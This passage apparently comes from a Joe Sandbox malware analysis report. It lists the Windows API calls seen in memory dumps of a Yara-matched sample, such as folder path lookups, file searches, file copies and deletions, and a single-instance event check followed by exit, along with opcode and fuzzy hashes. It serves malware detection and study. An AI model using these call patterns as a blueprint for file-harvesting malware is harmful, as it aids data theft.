                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                                  • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                                  • lstrcatA.KERNEL32(?,00866FB0), ref: 00414FAB
                                                  • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                  • String ID:
                                                  • API String ID: 2667927680-0
                                                  • Opcode ID: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                  • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                                  • Opcode Fuzzy Hash: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                  • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcessstrtok_s
                                                  • String ID:
                                                  • API String ID: 3407564107-0
                                                  • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                  • Instruction ID: ddeacf7cf3dd85e7642bd0dadaed5d3800e0014b43535b69b030ac65a0cd67f3
                                                  • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                  • Instruction Fuzzy Hash: 76116DB4900209EFCB04EFE4D948AEDBBB9FF04305F6084A9E80567290E7306B04CF55
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                                  • wsprintfA.USER32 ref: 004179F3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocLocalProcessTimewsprintf
                                                  • String ID:
                                                  • API String ID: 1243822799-0
                                                  • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                  • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                                  • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                  • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 00B37C17
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B37C1E
                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 00B37C2B
                                                  • wsprintfA.USER32 ref: 00B37C5A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                  • String ID:
                                                  • API String ID: 377395780-0
                                                  • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                  • Instruction ID: 6de023c0983d82bc89e0bf31e1c2478f82f00b4ed65846893b13fd5e9ebf5e99
                                                  • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                  • Instruction Fuzzy Hash: FC1127B2944118BBCB14DFC9DD45BBEB7F9FB4DB11F10425AF605A2280D6395940CBB1
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00B37CCA
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B37CD1
                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00B37CE4
                                                  • wsprintfA.USER32 ref: 00B37D1E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                  • String ID:
                                                  • API String ID: 3317088062-0
                                                  • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                  • Instruction ID: 6456628bfa162cc85db5b227d3f69ad0b038937afeb35b0c0482e701a53efbbb
                                                  • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                  • Instruction Fuzzy Hash: 88115EB1A85218EFEB208B54DC49FA9B7B8FB05721F2043EAE51AA32C0CB7459408F51
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strtok_s
                                                  • String ID:
                                                  • API String ID: 3330995566-0
                                                  • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                  • Instruction ID: 20c5b141558a6be6df08f9158868b7d286a7a7090efdc5f179973c2f05451fa0
                                                  • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                  • Instruction Fuzzy Hash: BA11B3B4E40209EFDB14CFA6D988BAEB7F5EB08B05F20C129E025A6250D7B49605CF55
                                                  APIs
                                                  • CreateFileA.KERNEL32(00B33D55,80000000,00000003,00000000,00000003,00000080,00000000,?,00B33D55,?), ref: 00B39563
                                                  • GetFileSizeEx.KERNEL32(000000FF,00B33D55), ref: 00B39580
                                                  • CloseHandle.KERNEL32(000000FF), ref: 00B3958E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleSize
                                                  • String ID:
                                                  • API String ID: 1378416451-0
                                                  • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                  • Instruction ID: a8a06e432725a3782b44bbe21fa07cfae037a8abeca972ee8d1c772f7085e930
                                                  • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                  • Instruction Fuzzy Hash: 95F04F39E40308BBEB25DFF0DC49B9E77FAEB59710F21C694FA11A7280D67596418B40
                                                  APIs
                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B36D31
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B36D4F
                                                  • CloseHandle.KERNEL32(00000000), ref: 00B36D60
                                                  • Sleep.KERNEL32(00001770), ref: 00B36D6B
                                                  • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00B36D81
                                                  • ExitProcess.KERNEL32 ref: 00B36D89
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                  • String ID:
                                                  • API String ID: 941982115-0
                                                  • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                  • Instruction ID: 94253fe0dac063937720b64dfbe29e5cf2020f726d4873691d800b8c8f344cb8
                                                  • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                  • Instruction Fuzzy Hash: D8F0BE38A40205BFE710AFE0CC0ABBD77B4EB05301F3085B8F112A11D0CBB04500CA56
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `o@
                                                  • API String ID: 0-590292170
                                                  • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                  • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                                  • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                  • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                                  APIs
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                                  • lstrcatA.KERNEL32(?,0086ADF8), ref: 00414C08
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                    • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,0086C040,?,000003E8), ref: 00414A4A
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                    • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                    • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                  • String ID: UaA
                                                  • API String ID: 2104210347-3893042857
                                                  • Opcode ID: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                                  • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                                  • Opcode Fuzzy Hash: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                                  • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • GetSystemTime.KERNEL32(?,00832A10,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SystemTimelstrcpy
                                                  • String ID: cI@$cI@
                                                  • API String ID: 62757014-1697673767
                                                  • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                  • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                                  • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                  • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                                  APIs
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                                  • lstrcatA.KERNEL32(?,0086A7B8), ref: 004150A8
                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                  • String ID: aA
                                                  • API String ID: 2699682494-2567749500
                                                  • Opcode ID: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                  • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                                  • Opcode Fuzzy Hash: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                  • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                                  APIs
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                    • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                    • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                    • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                    • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                    • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                    • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                    • Part of subcall function 00B2A077: memcmp.MSVCRT(?,00421264,00000003), ref: 00B2A094
                                                  • lstrlen.KERNEL32(00000000), ref: 00B2BF06
                                                    • Part of subcall function 00B39097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B390B9
                                                  • StrStrA.SHLWAPI(00000000,004213E0), ref: 00B2BF34
                                                  • lstrlen.KERNEL32(00000000), ref: 00B2C00C
                                                  • lstrlen.KERNEL32(00000000), ref: 00B2C020
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                  • String ID:
                                                  • API String ID: 1440504306-0
                                                  • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                  • Instruction ID: c268e11c0ebc0aa9c18c9fda7a4d8380410d0f9f41d3d1bf079d4a102e6748b1
                                                  • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                  • Instruction Fuzzy Hash: 7AB16372910218ABCB14FBA0DD96EEE77B9AF15301F705199F446620A1EF346F48CF62
                                                  APIs
                                                  • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                                  • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFileNextlstrcat
                                                  • String ID: !=A
                                                  • API String ID: 3840410801-2919091325
                                                  • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                                  • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                                  • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                                  • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                                  APIs
                                                    • Part of subcall function 00B39047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B39072
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B351E1
                                                  • lstrcat.KERNEL32(?,00421070), ref: 00B351FE
                                                  • lstrcat.KERNEL32(?,0064A5F8), ref: 00B35212
                                                  • lstrcat.KERNEL32(?,00421074), ref: 00B35224
                                                    • Part of subcall function 00B34B77: wsprintfA.USER32 ref: 00B34B93
                                                    • Part of subcall function 00B34B77: FindFirstFileA.KERNEL32(?,?), ref: 00B34BAA
                                                    • Part of subcall function 00B34B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00B34BD8
                                                    • Part of subcall function 00B34B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00B34BEE
                                                    • Part of subcall function 00B34B77: FindNextFileA.KERNEL32(000000FF,?), ref: 00B34DE4
                                                    • Part of subcall function 00B34B77: FindClose.KERNEL32(000000FF), ref: 00B34DF9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                  • String ID:
                                                  • API String ID: 2667927680-0
                                                  • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                  • Instruction ID: d79962a528f697bc759fb9fa8093bf7bda692bbfafcaac03161388312a52c6d0
                                                  • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                  • Instruction Fuzzy Hash: 9B21DD7AA402147BC714FBF0EC46EE973BDAB55300F4045C8768992191EE749AC9CF92
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpynlstrlenwsprintf
                                                  • String ID:
                                                  • API String ID: 1206339513-0
                                                  • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                  • Instruction ID: 69d18565d389b8bb58a82cb6ecb2cd40c66ee4284a7c45517a8fa544f3a4b8cf
                                                  • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                  • Instruction Fuzzy Hash: 20011E79540108FFCB04DFECD984EAE7BBAEF45354F108148F9098B300C631AA40DB91